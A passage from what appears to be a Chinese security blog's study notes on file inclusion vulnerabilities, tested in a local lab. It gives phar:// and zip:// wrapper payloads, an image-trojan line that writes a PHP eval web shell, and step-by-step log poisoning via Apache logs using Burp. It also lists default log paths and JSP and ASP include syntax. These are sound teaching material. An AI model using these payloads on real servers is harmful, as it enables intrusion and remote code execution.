<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index2.php?<span class="keyword">file</span>=phar:<span class="comment">//phpinfo.zip/phpinfo.txt</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-489da319d283d845.png" alt></p>
<h5 id="zip：-伪协议"><a href="#zip：-伪协议" class="headerlink" title="zip：//伪协议"></a>zip：//伪协议</h5><ul>
<li><p>php版本大于等于php5.3.0</p>
</li>
<li><p>zip伪协议和phar协议类似，但是用法不一样。</p>
</li>
<li><p>用法：?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php</p>
</li>
<li><p>条件： PHP &gt; =5.3.0，注意在windows下测试要5.3.0&lt;PHP&lt;5.4 才可以 #在浏览器中要编码为%23，否则浏览器默认不会传输特殊字符。</p>
</li>
</ul>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index2.php?file=zip://C:<span class="symbol">\p</span>hpStudy<span class="symbol">\W</span>WW<span class="symbol">\F</span>ileInclusion<span class="symbol">\p</span>hpinfo.zip<span class="variable">%23phpinfo.txt</span></span><br></pre></td></tr></table></figure>

<h4 id="本地包含配合文件上传"><a href="#本地包含配合文件上传" class="headerlink" title="本地包含配合文件上传"></a>本地包含配合文件上传</h4><p>如果目标服务器关闭了allow_url_fopen，则可以尝试使用本地包含+文件上传<br>上传一个图片木马a.jpg，内容为：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?</span>fputs(fopen(<span class="string">"shell.php"</span>,<span class="string">"w"</span>),<span class="string">"&lt;?php eval($_POST[tzc]);?&gt;"</span>)<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<h3 id="包含日志文件"><a href="#包含日志文件" class="headerlink" title="包含日志文件"></a>包含日志文件</h3><p>当我们没有上传点，并且也没有url_allow_include功能时，我们就可以考虑包含服务器的日志文件。<br>利用思路也比较简单，当我们访问网站时，服务器的日志中都会记录我们的行为，当我们访问链接中包含PHP一句话木马时，也会被记录到日志中。<br>这时候我们如果知道服务器的日志位置，我们可以去包含这个文件从而拿到shell。其实整个“包含日志文件漏洞利用”最关键的就是找日志存放的“物理路径”，只要找到日志的物理存放路径，一切就可以按部就班的完成利用了。<br>利用的条件：</p>
<ul>
<li>1.日志的物理存放路径</li>
<li>2.存在文件包含漏洞</li>
</ul>
<p>获取日志存放路径</p>
<p>（一）日志默认路径</p>
<p>(1) apache+Linux日志默认路径</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;httpd&#x2F;logs&#x2F;access_log</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/<span class="built_in">log</span>/httpd/access_log</span><br></pre></td></tr></table></figure>

<p>(2) apache+win2003日志默认路径</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">D:\xampp\apache\logs\access.<span class="built_in">log</span></span><br><span class="line">D:\xampp\apache\logs\error.<span class="built_in">log</span></span><br></pre></td></tr></table></figure>

<p>(3) IIS6.0+win2003默认日志文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\WINDOWS\system32\Logfiles</span><br></pre></td></tr></table></figure>

<p>(4) IIS7.0+win2003 默认日志文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%SystemDrive%\inetpub\logs\LogFiles</span><br></pre></td></tr></table></figure>

<p>(5) nginx 日志文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">日志文件在用户安装目录logs目录下</span><br><span class="line">        以我的安装路径为例/usr/<span class="built_in">local</span>/nginx,</span><br><span class="line">        那我的日志目录就是在/usr/<span class="built_in">local</span>/nginx/logs里</span><br></pre></td></tr></table></figure>

<p>首先，我们直接使用浏览器来构造“php一句话报错请求信息”服务自动记录此一句话信息到服务器日志文件中；<br>具体构造内容：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:81/FileInclusion/index2.php?file=<span class="php"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[c]);<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-f9f0db6a9d7ff53a%5B1%5D.png" alt></p>
<p>（2）测试结果：失败<br>利用文件包含漏洞直接访问“服务日志文件”，发现文件包含漏洞并未对构造的php一句话进行正常解析，观察发现是构造的PHP一句话中的相关字符在记录进日志文件后，相关的字符被转码了，导致PHP解析失败，具体失败原因见“失败原因分析”</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-738380f7e8b09e46%5B1%5D.png" alt></p>
<p>image.png（3）失败原因分析<br>一句话写入日志文件的利用过程是，利用浏览器直接构造一个关于请求资源的报错信息，消息中包含依据。报错信息服务自动记录到日志文件，但实际测试发现写入日志文件内的报错信息发生了字符转码：<br>日志文件内容如上图所示：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>/<span class="regexp">/127.0.0.1:81/</span>FileInclusion/index2.php?page=%<span class="number">3</span>C?php%<span class="number">20</span>@eval($_POST[c]);<span class="string">?%</span><span class="number">3</span>E</span><br></pre></td></tr></table></figure>

<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&lt;"</span>  ----&gt; 大于号被转码为了 %<span class="number">3</span>C</span><br><span class="line"> <span class="string">"&gt;"</span>  ----&gt; 小于号被转码为了 %<span class="number">3</span>E</span><br><span class="line"> <span class="string">" "</span>   ----&gt; 空格被转码为了 %<span class="number">20</span></span><br></pre></td></tr></table></figure>

<p>最后写入到日志文件中的一句话就变成了 %3C?php%20@eval($_POST[c]);?%3E。</p>
<p>（4） 失败总结<br>浏览器直接构造的PHP一句话中特殊字符，会被浏览器自动进行URL转义，导致最终写入日志文件中的PHP一句话包含了这些特殊字符，而这些转码后的编码PHP并不能进行正常的解析。<br>（5）构造一句话，写入日志文件测试记录<br>burpsuit 代理抓包改包构造一句话写入日志文件<br>（1） burpsuit 代理抓包，修改浏览器转码字符，写入正确的php一句话木马到服务器日志文件。</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-ff2a0beae4cc4468%5B1%5D.png" alt></p>
<p>（2） 测试记录：成功<br>通过文件包含直接访问服务日志文件，发现一句话被执行成功；</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-f5d368a6f62b9802%5B1%5D.png" alt></p>
<p>在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log，还可以包含Apache的错误访问日志</p>
<p>首先，构造一个会报错的访问链接，将利用代码（PHP一句话）写入错误日志记录中</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>/<span class="regexp">/127.0.0.1:81/</span>FileInclusion/index2.php%<span class="number">3</span>C?php%<span class="number">20</span>@eval($_POST[c]);<span class="string">?%</span><span class="number">3</span>E</span><br></pre></td></tr></table></figure>

<p>这个链接直接访问的话，一句话会被编码成%3C?php%20@eval($_POST[c]);?%3E，所以需要使用Burp suite改一下包。</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-e094a1b3f7e98f45%5B1%5D.png" alt></p>
<p>对所截获的包进行修改，点击go，返回403报错，服务器错误日志文件成功将此次记录到error.log中<br>我们根据日志的路径构造访问路径:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1:81/FileInclusion/index2.php?file=C:/phpStudy/Apache/logs/access.log</span></span><br></pre></td></tr></table></figure>

<p>客户端连接，获取一句话木马</p>
<h5 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h5><p>利用的条件：</p>
<p>利用条件：需要知道ssh-log的位置，且可读。默认情况下为 /var/log/auth.log</p>
<p>姿势：<br>用ssh连接：<br><a href="https://www.jianshu.com/p/7cbc878d64ae" target="_blank" rel="noopener">参考这个网站</a></p>
<h5 id="包含临时文件"><a href="#包含临时文件" class="headerlink" title="包含临时文件"></a>包含临时文件</h5><p><a href="https://vulhub.org/#/environments/php/inclusion/" target="_blank" rel="noopener">参考这个网站</a></p>
<h4 id="jsp文件包含漏洞"><a href="#jsp文件包含漏洞" class="headerlink" title="jsp文件包含漏洞"></a>jsp文件包含漏洞</h4><p>include</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ include <span class="keyword">file</span>=<span class="string">"head.jsp"</span>%&gt;</span><br><span class="line">&lt;%@ include <span class="keyword">file</span>=<span class="string">"body.jsp"</span>%&gt;</span><br><span class="line">&lt;%@ include <span class="keyword">file</span>=<span class="string">"tail.jsp"</span>%&gt;</span><br></pre></td></tr></table></figure>

<p>jsp:include</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;jsp:include <span class="attribute">page</span>=<span class="string">"head.jsp"</span>/&gt;</span><br><span class="line">&lt;jsp:include <span class="attribute">page</span>=<span class="string">"body.jsp"</span>/&gt;   </span><br><span class="line">&lt;jsp:include <span class="attribute">page</span>=<span class="string">"tail.jsp”/&gt;</span></span><br></pre></td></tr></table></figure>

<p>采用JSTL</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="built_in">c</span>:<span class="keyword">import</span> url="http:<span class="comment">//thief.one/1.jsp"&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="asp文件包含漏洞"><a href="#asp文件包含漏洞" class="headerlink" title="asp文件包含漏洞"></a>asp文件包含漏洞</h4><p>asp貌似无法包含远程文件（iis安全设置），只能包含本地文件，语法如下：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--#include file="1.asp" --&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="aspx文件包含漏洞"><a href="#aspx文件包含漏洞" class="headerlink" title="aspx文件包含漏洞"></a>aspx文件包含漏洞</h4><p>aspx文件包含与asp一样，语法如下：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--#include file="top.aspx" --&gt;</span></span><br></pre></td></tr></table></figure>



<hr>
<h5 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h5><p><a href="https://www.jianshu.com/p/8803aff98bfa" target="_blank" rel="noopener">https://www.jianshu.com/p/8803aff98bfa</a></p>
<p><a href="https://www.freebuf.com/articles/web/182280.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/182280.html</a></p>
<p><a href="https://blog.csdn.net/God_XiangYu/article/details/97335988#asp文件包含漏洞" target="_blank" rel="noopener">https://blog.csdn.net/God_XiangYu/article/details/97335988#asp%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E</a></p>
<p><a href="https://thief.one/2017/04/10/2/" target="_blank" rel="noopener">https://thief.one/2017/04/10/2/</a></p>

      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>Author: </span>
      <a href="https://shu1l.github.io">Shu1L</a>
    </p>
    <p class="copyright-item">
      <span>Link: </span>
      <a href="https://shu1l.github.io/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/">https://shu1l.github.io/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">文件包含漏洞</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2020/04/03/csrf-lou-dong-xue-xi/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">CSRF漏洞学习</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    <a class="next" href="/2020/04/03/dc-2-ba-ji-xue-xi/">
        <span class="next-text nav-default">DC-2靶机学习</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"></div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:hackshu1l@gmail.com" class="iconfont icon-email" title="email"></a>
        <a href="https://github.com/Shu1L" target="_blank" rel="noopener" class="iconfont icon-github" title="github"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even" target="_blank" rel="noopener">Even</a>
  </span>

  <span class="copyright-year">&copy;2015 - 2022<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">Shu1L</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><!-- SOHUCS Comments -->
<div id="SOHUCS"></div>
<script type="text/javascript">
(function(){
var appid = 'ScCGwbdkMqPLbNHvh2QCuo4h-gzGzoHsz';
var conf = '5KOK9KOQQT1AL9PmmwexKn2O';
var width = window.innerWidth || document.documentElement.clientWidth;
if (width < 960) {window.document.write('<script id="changyan_mobile_js" charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf + '"><\/script>'); } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://changyan.sohu.com/upload/changyan.js",function(){window.changyan.api.config({appid:appid,conf:conf})}); } })();
</script><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.0"></script>
</body>
</html>
